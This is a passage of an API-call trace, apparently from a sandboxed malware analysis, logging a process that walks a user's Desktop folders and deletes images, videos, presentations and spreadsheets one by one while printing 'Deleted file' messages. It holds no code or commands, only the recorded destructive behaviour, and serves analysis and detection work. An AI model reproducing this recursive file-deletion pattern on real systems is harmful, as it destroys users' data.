nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vvdZxZXGy537svJ.mp4\r\n") returned 0x4a [0064.045] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x4a, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x4a) returned 1 [0064.046] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89458a70, ftCreationTime.dwHighDateTime=0x1d5dddb, ftLastAccessTime.dwLowDateTime=0x3cf27a90, ftLastAccessTime.dwHighDateTime=0x1d5d7ee, ftLastWriteTime.dwLowDateTime=0x3cf27a90, ftLastWriteTime.dwHighDateTime=0x1d5d7ee, nFileSizeHigh=0x0, nFileSizeLow=0xb18e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yt6rrVQUgdZ1oPy.gif", cAlternateFileName="YT6RRV~1.GIF")) returned 1 [0064.046] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yt6rrVQUgdZ1oPy.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yt6rrvqugdz1opy.gif")) returned 1 [0064.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.049] GetFileType (hFile=0x7) returned 0x2 [0064.049] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.049] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0064.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.049] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0064.050] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.050] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yt6rrVQUgdZ1oPy.gif\r\n") returned 0x4a [0064.050] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x4a, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x4a) returned 1 [0064.051] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c15a470, ftCreationTime.dwHighDateTime=0x1d5db98, ftLastAccessTime.dwLowDateTime=0x57237f40, ftLastAccessTime.dwHighDateTime=0x1d5e04f, ftLastWriteTime.dwLowDateTime=0x57237f40, ftLastWriteTime.dwHighDateTime=0x1d5e04f, nFileSizeHigh=0x0, nFileSizeLow=0x112c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZToX37-PbNpvd.pps", cAlternateFileName="ZTOX37~1.PPS")) returned 1 [0064.051] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZToX37-PbNpvd.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ztox37-pbnpvd.pps")) returned 1 [0064.054] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.054] GetFileType (hFile=0x7) returned 0x2 [0064.054] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.054] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee33c | out: lpMode=0x3ee33c) returned 1 [0064.055] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.055] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee370 | out: lpConsoleScreenBufferInfo=0x3ee370) returned 1 [0064.055] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.055] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee3b0 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZToX37-PbNpvd.pps\r\n") returned 0x48 [0064.056] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x48, lpNumberOfCharsWritten=0x3ee394, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee394*=0x48) returned 1 [0064.056] FindNextFileW (in: hFindFile=0x7c2ed0, lpFindFileData=0x7c26cc | out: lpFindFileData=0x7c26cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c15a470, ftCreationTime.dwHighDateTime=0x1d5db98, ftLastAccessTime.dwLowDateTime=0x57237f40, ftLastAccessTime.dwHighDateTime=0x1d5e04f, ftLastWriteTime.dwLowDateTime=0x57237f40, ftLastWriteTime.dwHighDateTime=0x1d5e04f, nFileSizeHigh=0x0, nFileSizeLow=0x112c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZToX37-PbNpvd.pps", cAlternateFileName="ZTOX37~1.PPS")) returned 0 [0064.057] GetLastError () returned 0x12 [0064.057] FindClose (in: hFindFile=0x7c2ed0 | out: hFindFile=0x7c2ed0) returned 1 [0064.057] GetProcessHeap () returned 0x7b0000 [0064.057] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c26c0 | out: hHeap=0x7b0000) returned 1 [0064.057] GetProcessHeap () returned 0x7b0000 [0064.057] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x54) returned 0x7c26c0 [0064.057] GetProcessHeap () returned 0x7b0000 [0064.057] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x18) returned 0x7c65d0 [0064.057] GetProcessHeap () returned 0x7b0000 [0064.057] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x54) returned 0x7c2720 [0064.057] GetProcessHeap () returned 0x7b0000 [0064.057] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x808) returned 0x7c2780 [0064.057] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", fInfoLevelId=0x0, lpFindFileData=0x7c278c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x7c278c) returned 0x7c4788 [0064.058] FindNextFileW (in: hFindFile=0x7c4788, lpFindFileData=0x7c27c4 | out: lpFindFileData=0x7c27c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.058] FindNextFileW (in: hFindFile=0x7c4788, lpFindFileData=0x7c27fc | out: lpFindFileData=0x7c27fc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0064.058] FindNextFileW (in: hFindFile=0x7c4788, lpFindFileData=0x7c27fc | out: lpFindFileData=0x7c27fc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc0d4740, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xa4f50400, ftLastAccessTime.dwHighDateTime=0x1d5e4d7, ftLastWriteTime.dwLowDateTime=0xa4f50400, ftLastWriteTime.dwHighDateTime=0x1d5e4d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mfZck7HwXf4SziBj", cAlternateFileName="MFZCK7~1")) returned 1 [0064.058] FindNextFileW (in: hFindFile=0x7c4788, lpFindFileData=0x7c2860 | out: lpFindFileData=0x7c2860*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a308330, ftCreationTime.dwHighDateTime=0x1d5d7c0, ftLastAccessTime.dwLowDateTime=0x24457460, ftLastAccessTime.dwHighDateTime=0x1d5d7bd, ftLastWriteTime.dwLowDateTime=0x24457460, ftLastWriteTime.dwHighDateTime=0x1d5d7bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="moG2C7rzW", cAlternateFileName="MOG2C7~1")) returned 1 [0064.058] FindNextFileW (in: hFindFile=0x7c4788, lpFindFileData=0x7c28b8 | out: lpFindFileData=0x7c28b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe800af80, ftCreationTime.dwHighDateTime=0x1d623ff, ftLastAccessTime.dwLowDateTime=0xe8994600, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0x23e34700, ftLastWriteTime.dwHighDateTime=0x1d623f7, nFileSizeHigh=0x0, nFileSizeLow=0xc20b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="video_driver.exe", cAlternateFileName="VIDEO_~1.EXE")) returned 1 [0064.058] FindNextFileW (in: hFindFile=0x7c4788, lpFindFileData=0x7c28b8 | out: lpFindFileData=0x7c28b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe800af80, ftCreationTime.dwHighDateTime=0x1d623ff, ftLastAccessTime.dwLowDateTime=0xe8994600, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0x23e34700, ftLastWriteTime.dwHighDateTime=0x1d623f7, nFileSizeHigh=0x0, nFileSizeLow=0xc20b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="video_driver.exe", cAlternateFileName="VIDEO_~1.EXE")) returned 0 [0064.058] GetLastError () returned 0x12 [0064.058] FindClose (in: hFindFile=0x7c4788 | out: hFindFile=0x7c4788) returned 1 [0064.058] GetProcessHeap () returned 0x7b0000 [0064.058] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x18) returned 0x7c4788 [0064.058] GetProcessHeap () returned 0x7b0000 [0064.058] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x76) returned 0x7c6688 [0064.058] GetProcessHeap () returned 0x7b0000 [0064.058] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x808) returned 0x7c8b98 [0064.058] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\\*", fInfoLevelId=0x0, lpFindFileData=0x7c8ba4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x7c8ba4) returned 0x7c2f90 [0064.059] FindNextFileW (in: hFindFile=0x7c2f90, lpFindFileData=0x7c8ba4 | out: lpFindFileData=0x7c8ba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc0d4740, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xa4f50400, ftLastAccessTime.dwHighDateTime=0x1d5e4d7, ftLastWriteTime.dwLowDateTime=0xa4f50400, ftLastWriteTime.dwHighDateTime=0x1d5e4d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.059] FindNextFileW (in: hFindFile=0x7c2f90, lpFindFileData=0x7c8ba4 | out: lpFindFileData=0x7c8ba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddceac80, ftCreationTime.dwHighDateTime=0x1d5ded4, ftLastAccessTime.dwLowDateTime=0x17d15b70, ftLastAccessTime.dwHighDateTime=0x1d5dc92, ftLastWriteTime.dwLowDateTime=0x17d15b70, ftLastWriteTime.dwHighDateTime=0x1d5dc92, nFileSizeHigh=0x0, nFileSizeLow=0x76e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="C3I6eOjcg.flv", cAlternateFileName="C3I6EO~1.FLV")) returned 1 [0064.059] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\\C3I6eOjcg.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mfzck7hwxf4szibj\\c3i6eojcg.flv")) returned 1 [0064.061] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.061] GetFileType (hFile=0x7) returned 0x2 [0064.061] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.061] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee294 | out: lpMode=0x3ee294) returned 1 [0064.062] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.062] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee2c8 | out: lpConsoleScreenBufferInfo=0x3ee2c8) returned 1 [0064.062] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.062] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee308 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\\C3I6eOjcg.flv\r\n") returned 0x55 [0064.062] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0x3ee2ec, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee2ec*=0x55) returned 1 [0064.064] FindNextFileW (in: hFindFile=0x7c2f90, lpFindFileData=0x7c8ba4 | out: lpFindFileData=0x7c8ba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadaa9d0, ftCreationTime.dwHighDateTime=0x1d5ddd6, ftLastAccessTime.dwLowDateTime=0x47c0e570, ftLastAccessTime.dwHighDateTime=0x1d5dafe, ftLastWriteTime.dwLowDateTime=0x47c0e570, ftLastWriteTime.dwHighDateTime=0x1d5dafe, nFileSizeHigh=0x0, nFileSizeLow=0xd639, dwReserved0=0x0, dwReserved1=0x0, cFileName="hq8xL2.png", cAlternateFileName="")) returned 1 [0064.064] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\\hq8xL2.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mfzck7hwxf4szibj\\hq8xl2.png")) returned 1 [0064.066] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.066] GetFileType (hFile=0x7) returned 0x2 [0064.103] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.103] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee294 | out: lpMode=0x3ee294) returned 1 [0064.103] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee2c8 | out: lpConsoleScreenBufferInfo=0x3ee2c8) returned 1 [0064.104] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.104] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee308 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\\hq8xL2.png\r\n") returned 0x52 [0064.104] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x52, lpNumberOfCharsWritten=0x3ee2ec, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee2ec*=0x52) returned 1 [0064.105] FindNextFileW (in: hFindFile=0x7c2f90, lpFindFileData=0x7c8ba4 | out: lpFindFileData=0x7c8ba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafa7d970, ftCreationTime.dwHighDateTime=0x1d5d7f5, ftLastAccessTime.dwLowDateTime=0xd5272290, ftLastAccessTime.dwHighDateTime=0x1d5e151, ftLastWriteTime.dwLowDateTime=0xd5272290, ftLastWriteTime.dwHighDateTime=0x1d5e151, nFileSizeHigh=0x0, nFileSizeLow=0x160f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="q6TXhUAdi.bmp", cAlternateFileName="Q6TXHU~1.BMP")) returned 1 [0064.105] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\\q6TXhUAdi.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mfzck7hwxf4szibj\\q6txhuadi.bmp")) returned 1 [0064.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.108] GetFileType (hFile=0x7) returned 0x2 [0064.109] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.109] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee294 | out: lpMode=0x3ee294) returned 1 [0064.109] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.109] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee2c8 | out: lpConsoleScreenBufferInfo=0x3ee2c8) returned 1 [0064.110] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.110] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee308 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\\q6TXhUAdi.bmp\r\n") returned 0x55 [0064.110] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0x3ee2ec, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee2ec*=0x55) returned 1 [0064.111] FindNextFileW (in: hFindFile=0x7c2f90, lpFindFileData=0x7c8ba4 | out: lpFindFileData=0x7c8ba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6dfdf3f0, ftCreationTime.dwHighDateTime=0x1d5dfb2, ftLastAccessTime.dwLowDateTime=0xe05e6a10, ftLastAccessTime.dwHighDateTime=0x1d5db9d, ftLastWriteTime.dwLowDateTime=0xe05e6a10, ftLastWriteTime.dwHighDateTime=0x1d5db9d, nFileSizeHigh=0x0, nFileSizeLow=0x16cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="z8HWZufZB7.jpg", cAlternateFileName="Z8HWZU~1.JPG")) returned 1 [0064.111] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\\z8HWZufZB7.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mfzck7hwxf4szibj\\z8hwzufzb7.jpg")) returned 1 [0064.113] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.114] GetFileType (hFile=0x7) returned 0x2 [0064.114] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.114] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee294 | out: lpMode=0x3ee294) returned 1 [0064.114] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.114] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee2c8 | out: lpConsoleScreenBufferInfo=0x3ee2c8) returned 1 [0064.115] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Deleted file - %1\r\n") returned 0x13 [0064.115] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x400023a1, dwLanguageId=0x0, lpBuffer=0x4a424640, nSize=0x2000, Arguments=0x3ee308 | out: lpBuffer="Deleted file - C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\\z8HWZufZB7.jpg\r\n") returned 0x56 [0064.115] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x56, lpNumberOfCharsWritten=0x3ee2ec, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ee2ec*=0x56) returned 1 [0064.116] FindNextFileW (in: hFindFile=0x7c2f90, lpFindFileData=0x7c8ba4 | out: lpFindFileData=0x7c8ba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6dfdf3f0, ftCreationTime.dwHighDateTime=0x1d5dfb2, ftLastAccessTime.dwLowDateTime=0xe05e6a10, ftLastAccessTime.dwHighDateTime=0x1d5db9d, ftLastWriteTime.dwLowDateTime=0xe05e6a10, ftLastWriteTime.dwHighDateTime=0x1d5db9d, nFileSizeHigh=0x0, nFileSizeLow=0x16cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="z8HWZufZB7.jpg", cAlternateFileName="Z8HWZU~1.JPG")) returned 0 [0064.116] GetLastError () returned 0x12 [0064.116] FindClose (in: hFindFile=0x7c2f90 | out: hFindFile=0x7c2f90) returned 1 [0064.117] GetProcessHeap () returned 0x7b0000 [0064.117] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c8b98 | out: hHeap=0x7b0000) returned 1 [0064.117] GetProcessHeap () returned 0x7b0000 [0064.117] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x76) returned 0x7c6708 [0064.117] GetProcessHeap () returned 0x7b0000 [0064.117] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x18) returned 0x7c47a8 [0064.117] GetProcessHeap () returned 0x7b0000 [0064.117] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x76) returned 0x7c6788 [0064.117] GetProcessHeap () returned 0x7b0000 [0064.117] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x808) returned 0x7c8b98 [0064.118] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\\*", fInfoLevelId=0x0, lpFindFileData=0x7c8ba4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x7c8ba4) returned 0x7c2f90 [0064.118] FindNextFileW (in: hFindFile=0x7c2f90, lpFindFileData=0x7c8bdc | out: lpFindFileData=0x7c8bdc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc0d4740, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0x408f480, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x408f480, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.118] FindNextFileW (in: hFindFile=0x7c2f90, lpFindFileData=0x7c8c14 | out: lpFindFileData=0x7c8c14*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0064.118] GetLastError () returned 0x12 [0064.118] FindClose (in: hFindFile=0x7c2f90 | out: hFindFile=0x7c2f90) returned 1 [0064.118] GetProcessHeap () returned 0x7b0000 [0064.118] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x10) returned 0x7c0350 [0064.118] GetProcessHeap () returned 0x7b0000 [0064.118] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c0350 | out: hHeap=0x7b0000) returned 1 [0064.118] GetProcessHeap () returned 0x7b0000 [0064.118] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c8b98 | out: hHeap=0x7b0000) returned 1 [0064.118] GetProcessHeap () returned 0x7b0000 [0064.118] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c6788 | out: hHeap=0x7b0000) returned 1 [0064.118] GetProcessHeap () returned 0x7b0000 [0064.119] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c47a8 | out: hHeap=0x7b0000) returned 1 [0064.119] GetProcessHeap () returned 0x7b0000 [0064.119] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c6708 | out: hHeap=0x7b0000) returned 1 [0064.119] GetProcessHeap () returned 0x7b0000 [0064.119] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c6688 | out: hHeap=0x7b0000) returned 1 [0064.119] GetProcessHeap () returned 0x7b0000 [0064.119] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x68) returned 0x7c2f90 [0064.119] GetProcessHeap () returned 0x7b0000 [0064.119] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x808) returned 0x7c8b98 [0064.119] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\*", fInfoLevelId=0x0, lpFindFileData=0x7c8ba4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x7c8ba4) returned 0x7c3000 [0064.119] FindNextFileW (in: hFindFile=0x7c3000, lpFindFileData=0x7c8ba4 | out: lpFindFileData=0x7c8ba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a308330, ftCreationTime.dwHighDateTime=0x1d5d7c0, ftLastAccessTime.dwLowDateTime=0x24457460, ftLastAccessTime.dwHighDateTime=0x1d5d7bd, ftLastWriteTime.dwLowDateTime=0x24457460, ftLastWriteTime.dwHighDateTime=0x1d5d7bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.119] FindNextFileW (in: hFindFile=0x7c3000, lpFindFileData=0x7c8ba4 | out: lpFindFileData=0x7c8ba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7bf2350, ftCreationTime.dwHighDateTime=0x1d5d8aa, ftLastAccessTime.dwLowDateTime=0xe5d35a10, ftLastAccessTime.dwHighDateTime=0x1d5e2d6, ftLastWriteTime.dwLowDateTime=0xe5d35a10, ftLastWriteTime.dwHighDateTime=0x1d5e2d6, nFileSizeHigh=0x0, nFileSizeLow=0xcacd, dwReserved0=0x0, dwReserved1=0x0, cFileName="1VyHqT6C0o53edILQ.xls", cAlternateFileName="1VYHQT~1.XLS")) returned 1 [0064.119] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\1VyHqT6C0o53edILQ.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\1vyhqt6c0o53edilq.xls")) returned 1 [0064.122] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.122] GetFileType (hFile=0x7) returned 0x2 [0064.122] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0064.122] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ee294 | out: lpMode=0x3ee294) returned 1 [0064.123] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.123] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ee2c8 | out: 